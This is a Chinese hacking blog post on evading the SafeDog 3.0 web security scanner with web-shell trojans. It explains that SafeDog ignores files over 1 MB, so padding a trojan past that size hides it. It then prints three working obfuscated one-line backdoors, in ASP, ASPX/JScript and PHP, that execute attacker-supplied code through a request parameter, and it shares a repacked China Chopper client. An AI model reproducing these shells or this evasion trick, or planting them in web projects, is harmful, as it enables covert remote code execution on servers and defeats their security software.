关于脚本木马的免杀(针对安全狗的V3.0)经验
安全狗3.0默认忽略大于1048576字节即1M的文件(如图)。
至于怎么把木马弄成大于1M,你应该懂的。
另外,脚本文件只是在初次请求时进行编译,如果没有修改的话是不会再次编译的。
简单来说就是,文件变大了只会影响第一次访问速度,不会影响之后的访问速度。
最后再发几张一直珍藏的图片娱乐一下:jpg.rar
只要你是个黑客,你就应该懂得这是什么,
安全的图片,哈哈
收费的东西装不起,只能拿几个免费的来试一下了。安全狗什么的是我的最爱啊~
密码?就算我不说密码是-7你也能一眼看出来的吧?(=^_^=)
里面的一句话是
asp和aspx都拆掉了request,但是eval始终拆不掉,残念
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
php倒是完全拆掉了(还是php自由度高)
夸一下~哈哈
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
喔,顺便把我那把caidao也发一下吧
脱壳XXOO了之后,又加回了upx壳。。。版权什么的我也不知道怎么说了咳
希望这些东西几个月后还没烂透
(=^_^=)
相关内容:
本文“对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀”,来自:Nuclear’Atk 网络安全研究中心,本文地址:http://lcx.cc/?i=3617,转载请注明作者及出处!
